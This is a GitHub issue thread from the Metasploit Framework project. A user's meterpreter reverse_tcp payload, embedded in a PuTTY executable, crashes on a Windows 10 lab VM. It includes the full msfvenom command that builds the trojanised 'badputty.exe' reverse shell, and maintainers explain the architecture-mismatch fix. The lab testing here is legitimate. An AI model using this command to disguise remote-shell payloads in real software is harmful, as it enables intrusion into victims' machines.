### ISSUE TITLE
windows/x64/meterpreter/reverse_tcp not working in Windows10 (crashing)

### ISSUE THREAD

**Issue by nohepe** [rapid7/metasploit-framework#12192]
## Steps to reproduce
Hello, I am completely new to Kali & Metasploit. I would like to run my first sample payload and start reverse tcp. I am unable to run payload on victim machine (Windows10/Windows 8.1). It seems that payload crashes everytime.

Kali details:
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2019.2"
VERSION_ID="2019.2"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"

Metasploit details:
Framework Version: 5.0.20-dev

Win10 victim:
Windows 10 Enterprise Evaluation
Version 1809
OS build 17763.379
Firewall and Antivirus turned off.

Both systems running on my VirtualBox 6.0.10 r132072. Both computers are able to ping itself (using VirtualBox NatNetwork). VirtualBox is running on my host Windows 10 Enterprise

Windows 10 Host:
Windows 10 Enterprise
Version 1803
Build 17134.885

I tried to generate executable file with meterpreter reverse tcp on Kali, using msfvenom, with 64bit putty executable as source:

root@kali:/home/sshuser# msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe-only -x /home/sshuser/putty.exe -o /home/sshuser/badputty.exe LHOST=10.0.2.5 LPORT=4444

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe-only file: 886144 bytes
Saved as: /home/sshuser/badputty.exe

## Expected behavior

I expect to start TCP connection between Kali machine and victim, after I run badputty.exe on victim machine.

## Current behavior

What happens instead?

After I transferred that file to victim and run badputty.exe executable, nothing happened. Handler has been started beforehad on Kali. I analyzed Windows Event viewer and found that badputty.exe crashes immediately after its started. Event Viewer tells me following:
Faulting application name: badputty.exe, version 0.72.0.0, time stamp: 0x5d2aef16
Faulting module name: ntdll.dll, version 10.0.17763.348, time stamp: 0xca65c822
Exception code: 0xc00000005

### Metasploit version

Framework Version: 5.0.20-dev

### I installed Metasploit with:
Kali package via apt

**Comment by felipee07** [comment]
You are embedding a x64 payload into x86 executable. Just download x64 putty and try again.

**Comment by bwatters-r7** [comment]
Yeah; there's a guide online somewhere that does not make it clear that the template and the payload architectures must match.  Did that fix your problem, @nohepe?

**Comment by nohepe** [comment]
This is strange - I used putty-64bit-0.72-installer.msi  to get putty.exe. Then I checked file with payload and it looks like x64.

However, I tried to download x64 putty.exe executable directly from their web and now it works, so thank you guys!

**Comment by bwatters-r7** [comment]
I have recollections that venom does not support 64-bit msi files for templates, but we do support 64-bit exes.

**Comment by pbarry-r7** [comment]
Sounds like this was sorted out.  :)
